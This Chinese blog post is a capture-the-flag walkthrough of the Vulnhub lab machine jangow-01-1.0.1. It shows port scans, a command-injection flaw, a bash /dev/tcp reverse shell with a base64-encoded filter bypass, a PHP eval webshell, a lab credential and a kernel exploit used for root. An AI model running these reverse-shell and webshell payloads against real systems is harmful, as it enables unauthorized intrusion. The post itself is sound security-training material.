jangow-01-1.0.1靶机

最新推荐文章于 2024-08-08 10:00:00 发布
最新推荐文章于 2024-08-08 10:00:00 发布
阅读量178 收藏
点赞数 6
分类专栏: 靶机训练 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ybk6666/article/details/134179464
版权

信息收集

使用arp-scan 从网络接口配置生成地址,来查看ip

输入命令:

arp-scan -l

image-20231102090200003

nmap扫描端口开放

tcp

输入命令:

nmap -min-rate 10000 -p- 192.168.187.163

可以看到开放2个端口

image-20231102090558317

udp

输入命令:

nmap -sU -min-rate 10000 -p- 192.168.187.163

这里可以看到有一个80端口但是是关闭状态,那我们不用管它

image-20231102090653969

nmap扫描端口信息

输入命令:

nmap -sC -sT -sV -O -p 21,80 192.168.187.163

image-20231102090922314

nmap漏洞脚本扫描

输入命令:

nmap --script=vuln -p 21,80 192.168.187.163

没有扫描到可以利用的点

image-20231102093428210

image-20231102093520306

尝试ftp匿名登录

输入命令:

ftp 192.168.187.163

匿名登录的用户名为anonymous,这里尝试了无密码匿名登录,但是失败了,只能先放弃了

image-20231102093642980

登录web端

可以看到是一个目录结构,有一个site目录结构

image-20231102093838549

当我们点进去这个site时,发现跳转到了一个新的页面

image-20231102094008761

渗透思路

1.查看页面url请求

在刚刚的目录界面,我们可以查询一下那个页面支持的url请求中是否有PUT这个选项,如果支持的话,我们可以直接上传webshell,直

接拿到立足点

输入命令:

curl -v -X OPTIONS http://192.168.187.163 // -v 查看详细信息 -X 指定一个参数,指定OPTIONS可以查看所支持的所有参数

但是我们并没有看到PUT这个选项,那我们可以换一种思路了

image-20231102094939740

2.进入到site里面的新页面,继续收集信息

在这个页面下,点击这个右上角的buscar时可以跳转到了一个新的页面

image-20231102095502778

发现可疑的url

这个页面很神奇,什么也没有显示,查看页面源代码,也什么都没有,可能是做了隐藏机制

但是这个url很特殊,后面跟个= 就很奇怪,加一些参数什么的试试

image-20231102095558358

发现命令注入漏洞

这里尝试了一些参数后,发现当我们输入一些命令时,他可以回显信息,那我们就可以尝试url中来构造payload语句,反弹shell

image-20231102095833591

先在kali中开启监听

image-20231102110147599

这里尝试了直接使用反弹语句显示失败,可能是存在过滤了

bash -i >& /dev/tcp/192.168.187.128/443 0>&1

image-20231102105931615

尝试base64加密解密的方式绕过试试

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4Ny4xMjgvNDQzIDA+JjE='|base64 -d|bash

但是输入以后还是没有任何的结果

image-20231102110105105

上传一句话木马

这里经过一点点尝试以后,发现类似 >< 这种字符是无法显示的,应该是对这些字符做了特殊处理,那我们尝试一下上传一句话木马

构造payload语句,然后上传试试

echo '<?php eval($_POST["cmd"]); ?>' > shell.php

页面还是一片空白,我们可以查看一下我们的shell.php文件是否建立成功

image-20231102111437825

使用ls查看一下,发现已经存在了

image-20231102111548664

蚁剑连接

那我们现在可以使用蚁剑连接了,这里要注意,上传的shell.php的存放位置是在/site这个目录下,不是在刚刚的位置

image-20231102111940738

发现用户信息

在这个位置的文件中,我们找到了一组用户名和密码,看样子很像数据库的登录信息

desafio02:abygurl69

我们暂时先记下来,这边我们蚁剑虽然连接成功,但是只是一个webshell,我们还是需要拿到正常权限的shell才行

image-20231102112313087

制作php文件反弹shell

在蚁剑中制作反弹shell的php文件

image-20231102112949799

这里我们打开文件,将反弹php语句写入然后保存即可(注:这里我用的是自己的,选择有很多,可以自己尝试)

image-20231102113034371

然后我们回到页面中打开这个文件

image-20231102113359828

然后我们就可以在kali中收到反弹shell的连接信息了

image-20231102113320163

切换到交互式shell

输入命令:

python3 -c ‘import pty;pty.spawn(“/bin/bash”)’

image-20231102113618871

切换用户

这边我们到/home下可以查看到只有一个用户名

image-20231102114025983

联想到我们之前找到的用户信息,我们可以试试那个密码是否也是该用户的密码

使用su切换,输入密码后发现成功切换

image-20231102113851339

提权

这边经过一番尝试,sudo提权,suid提权,查看计划任务等方法都失败了,最后是利用内核漏洞的方法成功了

查看内核漏洞

输入命令:

uname -a //查看内核版本

cat /etc/issue.net // 查看操作系统版本

image-20231102114549626

利用漏洞

然后我们可以去kali里面寻找有无对应的漏洞,这里经过一番试错后,在使用这个45010.c文件的时候,成功提权了

image-20231102115049324

我们这里将文件下载到本地上

image-20231102115336909

然后我们开启http临时服务

image-20231102115423282

但是我们使用wget命令下载的时候发现,命令无法执行,那我们可以直接从蚁剑上传

image-20231102115534911

这里直接将文件拖进来就可以了,这里建议放在/tmp这个目录中,放在其他的目录里,我们可能没有权限

image-20231102115704324

编译赋权执行

然后我们在靶机的/tmp编译这个文件,然后赋予可执行权限即可

输入命令:

gcc 45010.c -o exp

chmod 777 exp

image-20231102120306924

然后我们执行这个文件,发现成功提权

image-20231102120417311

拿下flag

然后我们可以在/root拿到我们的flag

image-20231102120448545

遥不可及的,梦!
关注
专栏目录
jangow-01-1.0.1
qq_46140711的博客
09-22 1221
jangow-01-1.0.1靶机练习
jangow-01-1.0.1靶机复现
weixin_62162207的博客
07-30 328
jangow-01-1.0.1靶机复现
超详细jangow-01-1.0.1靶机复现过程
weixin_67729650的博客
08-05 1331
靶机导入到最后的提权这一过程,重在思路的建立.
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1172
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
vulnhub——jangow-01-1.0.1靶机渗透 超详细
qq_48368964的博客
07-31 455
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。init用于指定内核挂载根文件系统后运行的第一个用户空间程序的绝对路径(也有文章描述为设置内核执行的初始化进程名)。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)重启进入系统,使用刚才修改的root密码进入root权限。
jangow-01-1.0.1 靶机渗透
braty_的博客
04-06 368
看了一些大佬的wp,发现该靶机只能用443端口,防火墙做了限制。
vulnhub靶机jangow-01-1.0.1
weixin_68416970的博客
08-08 631
保存下面代码为一个 php 文件,重命名为 test.php,上传到靶机的 /var/www/html/site/ 目录下。因为靶机的原因无法使用监听端口的方法传输文件,直接把 45010.c 从 kali 拖到本机桌面,再用蚁剑上传。修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)因为我 kali 的小 bug,这里输入的命令会显示双写,但是不影响命令执行。在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。
jangow-01-1.0.1靶机渗透测试
weixin_58786230的博客
07-12 247
【代码】jangow-01-1.0.1靶机渗透测试。
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 173
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
我的世界光影SEUS-Renewed-v1.0.1.zip
05-16
"SEUS-Renewed-v1.0.1.zip" 是一款专为《我的世界》设计的光影包,它基于经典的SEUS光影进行改进和优化,旨在提供更加美观、真实的视觉享受。 SEUS光影最初由Creeperman86开发,因其独特的视觉风格和高质量的光影...
rocketmq-console-ng-1.0.1.jar
07-22
java -jar rocketmq-console-ng-1.0.1.jar 启动 ---当终端断了该服务就会停止 nohup java -jar rocketmq-console-ng-1.0.1.jar >>/soft/RocketMQ/rocketmqlogs/log.out 2>&1 & 后台启动 --当终端断了也不会停止服务
VulnHub靶机-Jangow: 1.0.1
weixin_46694260的博客
09-15 2761
迟到的文章,就当库存发出来吧~
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8527
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
一款面向 AIoT 场景的分布式多模数据库产品,支持在同一实例同时建立时序库和关系库并融合处理多模数据
10-31
KWDB 是一款面向 AIoT 场景的分布式多模数据库产品,支持在同一实例同时建立时序库和关系库并融合处理多模数据,具备千万级设备接入、百万级数据秒级写入、亿级数据秒级读取等时序数据高效处理能力,具有稳定安全、高可用、易运维等特点。
yolo算法-跌倒检测数据集-10787张图像带标签-检测到跌倒fall-detection-ca3o8.zip
10-31
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别保存在两个文件夹中; yolo格式:<class> <x_center> <y_center> <width> <height>, 其中: <class> 是目标的类别索引(从0开始)。 <x_center> 和 <y_center> 是目标框中心点的x和y坐标,这些坐标是相对于图像宽度和高度的比例值,范围在0到1之间。 <width> 和 <height> 是目标框的宽度和高度,也是相对于图像宽度和高度的比例值
重庆外语外事学院在四川2020-2024各专业最低录取分数及位次表.pdf
10-31
那些年,与你同分同位次的同学都去了哪里?全国各大学在四川2020-2024年各专业最低录取分数及录取位次数据,高考志愿必备参考数据
maple学习,本人对maple教程这本书的学习过程
最新发布
10-31
做4.3这一节的时候的maple文件,仅供参考
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值